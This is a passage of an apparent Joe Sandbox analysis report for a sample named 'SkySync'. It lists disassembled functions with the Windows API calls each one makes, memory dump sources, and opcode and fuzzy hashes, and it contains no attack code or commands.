Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: cc3fda0b6b0e195fc79ead00c641b4d8f14fd72fc7200bc127edb07c91bcd240
Instruction ID: fa5f8ba0d35efd3be6614c4b95c91a4ee2a87318e9237059a8014ad6378586b1
Opcode Fuzzy Hash: cc3fda0b6b0e195fc79ead00c641b4d8f14fd72fc7200bc127edb07c91bcd240
Instruction Fuzzy Hash: EA21A371908205AF8B10EF68C88587EB7F4FE5A364F10461DF595CB2E2DB30DA46CB52

Function 00B1634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00B163BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B163D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B163E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B163F3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 7bb25613a2ff533fb9177abf925de282a6b554c3feddf1c5e7d3035ef2ca3372
Instruction ID: f78fe34818653450b9026988ee18d5f48bbe4e5590f1f3a88a6988626a37f296
Opcode Fuzzy Hash: 7bb25613a2ff533fb9177abf925de282a6b554c3feddf1c5e7d3035ef2ca3372
Instruction Fuzzy Hash: B2112631304514AFDB11AB28DC55FBE77D9EF45320F144158F826C72D2CB60AC41CB95

Function 00AEE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AEE46F,?,?,?,00AEF262,00000000,000000EF,00000119,?,?), ref: 00AEF867
Part of subcall function 00AEF858: lstrcpyW.KERNEL32(00000000,?,?,00AEE46F,?,?,?,00AEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AEF88D
Part of subcall function 00AEF858: lstrcmpiW.KERNEL32(00000000,?,00AEE46F,?,?,?,00AEF262,00000000,000000EF,00000119,?,?), ref: 00AEF8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AEE488
lstrcpyW.KERNEL32(00000000,?,?,00AEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AEE4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00AEF262,00000000,000000EF,00000119,?,?,00000000), ref: 00AEE4E2

Strings

cdecl, xrefs: 00AEE4D9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 5c30cc89bc39444fad446f46a0ab87ea142a37f947e3c8d599bc939e1e801d8f
Instruction ID: 6a0af9e797377e630a82a1e6adb07ee81686a4d426a83029064576765edc0e7a
Opcode Fuzzy Hash: 5c30cc89bc39444fad446f46a0ab87ea142a37f947e3c8d599bc939e1e801d8f
Instruction Fuzzy Hash: 9B11BF3A200385AFDB25EF35DC45DBA77B9FF45350B40402AF806CB2A0EB719951D7A1

Function 00AE96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AE9719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AE972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AE9741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AE975C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 48e2a2f8f75f7a9dfce641547a9b256bfae740343692f311351317b1de5abc26
Instruction ID: 1e98db8a1c631de002bb4644dfd3a35de1d5bff52a6e58c2caed33793bf825b1
Opcode Fuzzy Hash: 48e2a2f8f75f7a9dfce641547a9b256bfae740343692f311351317b1de5abc26
Instruction Fuzzy Hash: B0115A39900218FFEB11DF95CD84EDEBBB8FB48710F204091E900B7290D6716E15DB90

Function 00A9166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00A929E2: GetWindowLongW.USER32(?,000000EB), ref: 00A929F3

DefDlgProcW.USER32(?,00000020,?), ref: 00A916B4
GetClientRect.USER32(?,?), ref: 00ACB93C
GetCursorPos.USER32(?), ref: 00ACB946
ScreenToClient.USER32(?,?), ref: 00ACB951

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: c7ab6c751d02dc06cb15997f7edb6142b8f1ffa4f650a4db4cbca0a979a4107d
Instruction ID: d50f7ad35613aa6311ff008075fe78e3082997b630f572a749a173380e0686e8
Opcode Fuzzy Hash: c7ab6c751d02dc06cb15997f7edb6142b8f1ffa4f650a4db4cbca0a979a4107d
Instruction Fuzzy Hash: B7112535A1011AABCF10EF98D885DFE77F8EB04301F540496FA51E7151DB34BA52CBA1

Function 00AF504E Relevance: 6.1, APIs: 4, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00AF5075
MessageBoxW.USER32(?,?,?,?), ref: 00AF50A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AF50BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AF50C5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 86b4ae70122edf4fc78e2d07cdc6a289e3bca7ba0557235239efb3558029f0af
Instruction ID: 1886c6e862073ab6005b9e586e2688e1d7514001113ac09c60a3080a42452927
Opcode Fuzzy Hash: 86b4ae70122edf4fc78e2d07cdc6a289e3bca7ba0557235239efb3558029f0af
Instruction Fuzzy Hash: EA11E9719187187FC7119BA89C04AAB7FACAB46321F140259FA14D3251DE72890487E0

Function 00A92111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A9214F
GetStockObject.GDI32(00000011), ref: 00A92163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A9216D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 99dddbfd16bd586497d294dc4de9df0037e74ccd47406237db4fc781a9ce5de8
Instruction ID: 88a7cfdb2e5ccd3caf0dcf1dc1e0fdf03be49f4a1ee8a136ebc88d218144a656
Opcode Fuzzy Hash: 99dddbfd16bd586497d294dc4de9df0037e74ccd47406237db4fc781a9ce5de8
Instruction Fuzzy Hash: F3116D72611649BFDF125F909C45FEBBBADEF58754F150216FA0452120CB31DC61EBA0

Function 00AC50B7 Relevance: 6.1, APIs: 4, Instructions: 53timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00AC50EB
GetCurrentThreadId.KERNEL32 ref: 00AC50FA
GetCurrentProcessId.KERNEL32 ref: 00AC5103
QueryPerformanceCounter.KERNEL32(?), ref: 00AC5110

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0a2286b5becb16c084aee6f71362677f8fdf1248e141f7629cd9244c90e18752
Instruction ID: a555d88f59dcf6e43d81a82edd7940d17adf5f26fabe01c0459fe4e49fafa9bb
Opcode Fuzzy Hash: 0a2286b5becb16c084aee6f71362677f8fdf1248e141f7629cd9244c90e18752
Instruction Fuzzy Hash: 64115171D11608DBDF14EBB8D959BAEB7F4EB08312F55456EE803E7250EF34AA008B50

Function 00AF1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AF04EC,?,00AF153F,?,00008000), ref: 00AF195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AF04EC,?,00AF153F,?,00008000), ref: 00AF1983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AF04EC,?,00AF153F,?,00008000), ref: 00AF198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00AF04EC,?,00AF153F,?,00008000), ref: 00AF19C0

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ef528855d404bb014e975fc43ad77df6a09b307547b218038e8a5323ff83fa1d
Instruction ID: 6a1bc0ab6e91faf1a0e37926249b7580f871f4c106cd5f9b9c0d7ff35bd28e0c
Opcode Fuzzy Hash: ef528855d404bb014e975fc43ad77df6a09b307547b218038e8a5323ff83fa1d
Instruction Fuzzy Hash: 7E114531C0062DDBCF10AFE5D999AEEBBB8FF08752F004045EA80B2245CB7096618BD1

Function 00B1E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B1E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00B1E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00B1E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00B1E234

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 419cc8477f4962eee74012ca0e8f1b5a55d6b692a71f4ae03251798f9d43515b
Instruction ID: b72d5342307341a23886e4ec4b8024d9e5c6344292b56d4b63b5979e20be3a9e
Opcode Fuzzy Hash: 419cc8477f4962eee74012ca0e8f1b5a55d6b692a71f4ae03251798f9d43515b
Instruction Fuzzy Hash: C2118EB42013049BE7309F50EC08FD3BBFCEF04B00F508599AE26D6141D7B4E5449BA1

Function 00B1B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B1B956
ScreenToClient.USER32(?,?), ref: 00B1B96E
ScreenToClient.USER32(?,?), ref: 00B1B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1B9AD

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 5c404fec8c56621607587a6bb784a2adaf5460488fa754ddb2c66acc0af15570
Instruction ID: 2fae68773f76cb78b6973be7bbf14a7b9a09be4f8eac405254d19b4777104202
Opcode Fuzzy Hash: 5c404fec8c56621607587a6bb784a2adaf5460488fa754ddb2c66acc0af15570
Instruction Fuzzy Hash: BC1144B9D00209EFDB51DF98C984AEEBBF9FF48310F104156E914E3610D735AA658F50

Function 00B1C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A916CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A91729
Part of subcall function 00A916CF: SelectObject.GDI32(?,00000000), ref: 00A91738
Part of subcall function 00A916CF: BeginPath.GDI32(?), ref: 00A9174F
Part of subcall function 00A916CF: SelectObject.GDI32(?,00000000), ref: 00A91778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B1C3E8
LineTo.GDI32(00000000,?,?), ref: 00B1C3F5
EndPath.GDI32(00000000), ref: 00B1C405
StrokePath.GDI32(00000000), ref: 00B1C413

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: c07d7372fc4fc103bdbf88756aabd226218c5d359a29492cef317b8500d9f5e1
Instruction ID: cc1f6af710d45a333a77916342961acecd15b17c9a5418d50692b4e82b6a9432
Opcode Fuzzy Hash: c07d7372fc4fc103bdbf88756aabd226218c5d359a29492cef317b8500d9f5e1
Instruction Fuzzy Hash: 65F0E23114521DBBEB236F55AC0EFCE3F99AF05311F048040FA11621E28F742562DFA9

Function 00AEAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AEAA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AEAA82
GetCurrentThreadId.KERNEL32 ref: 00AEAA89
AttachThreadInput.USER32(00000000), ref: 00AEAA90

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 99bee26df947311a1da87be64c9432db29056a68bf10397dd68cc499fbf6b6db
Instruction ID: 643681ba1bcece91c0f7a03442a8cd0fdd9a3510c33df0369eae2832f77c7e3e
Opcode Fuzzy Hash: 99bee26df947311a1da87be64c9432db29056a68bf10397dd68cc499fbf6b6db
Instruction Fuzzy Hash: DDE03931545328BBEB326FA2DD0CEE73F1CEF267A1F008021F50996061CA759551CBA0

Function 00A925F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A9260D
SetTextColor.GDI32(?,000000FF), ref: 00A92617
SetBkMode.GDI32(?,00000001), ref: 00A9262C
GetStockObject.GDI32(00000005), ref: 00A92634
GetWindowDC.USER32(?,00000000), ref: 00ACC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00ACC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00ACC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00ACC203
GetPixel.GDI32(00000000,?,?), ref: 00ACC223
ReleaseDC.USER32(?,00000000), ref: 00ACC22E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 6c5480c18242c5b404ecc4f394317fd54c811018ac013237de2fe055c1d01c17
Instruction ID: 19fa6d8338acea214b8828c0b0179835111bea2e2d71f034d21b93a6b8562217
Opcode Fuzzy Hash: 6c5480c18242c5b404ecc4f394317fd54c811018ac013237de2fe055c1d01c17
Instruction Fuzzy Hash: 3CE06D31614244BFDF316FA8AC49BD87B11EB15332F04836AFA69580E68B714A91DB12

Function 00AE9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00AE9339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00AE8F04), ref: 00AE9340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AE8F04), ref: 00AE934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00AE8F04), ref: 00AE9354

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: df7e25ffd08be1f52a1e0aea1b0ce8b0f7fad949358983f06c2ca2119b038341
Instruction ID: 10bf5bcc9c3709bdd068bd272cf999f70b8e7e2c5225de506f31257da8438ad7
Opcode Fuzzy Hash: df7e25ffd08be1f52a1e0aea1b0ce8b0f7fad949358983f06c2ca2119b038341
Instruction Fuzzy Hash: 7CE08672621312DFE7306FB25D0DB573B6CEF547A1F104818B245DB092EA349446C755

Function 00AD0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AD0679
GetDC.USER32(00000000), ref: 00AD0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AD06A3
ReleaseDC.USER32(?), ref: 00AD06C4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2b1a41b7c244e6c3d0120678223104f1277fdacb16360db27af3bd0230b05f6b
Instruction ID: b215c9163e9c6e9c2b17c53c9c4d3b41f4c08ef1e005a1b1d9abfb80796f971d
Opcode Fuzzy Hash: 2b1a41b7c244e6c3d0120678223104f1277fdacb16360db27af3bd0230b05f6b
Instruction Fuzzy Hash: 44E012B5910204EFDF22AFB0D808BAE7BF1EB8C311F118009F85AE7611CB7885529F50

Function 00AD068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00AD068D
GetDC.USER32(00000000), ref: 00AD0697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AD06A3
ReleaseDC.USER32(?), ref: 00AD06C4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d00e1c2996d993d5f4dc419201f3c19076e1cabbdd44163155f245734609a3f2
Instruction ID: fcdcadf3de8d9ae37958d371bb4dd0b7708bbc4599cbb61e801a9583df4f8b7e
Opcode Fuzzy Hash: d00e1c2996d993d5f4dc419201f3c19076e1cabbdd44163155f245734609a3f2
Instruction Fuzzy Hash: F5E012B5910204EFCF22AFA0D808A9E7BF1EB8C311F108008F95AE7211CB3895528F50

Function 00AFF166 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 323COMMON

Download Yara Rule

Strings

X, xrefs: 00AFF3D6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: cc95cb0d89db854a95bc3f1a3d847bcdd8dac5a6f0f94e2113b24d871d4fd808
Instruction ID: 49bceadb3cc38b7f25e336879daaf287aac7a91b588eb28da5c808e96ba572e9
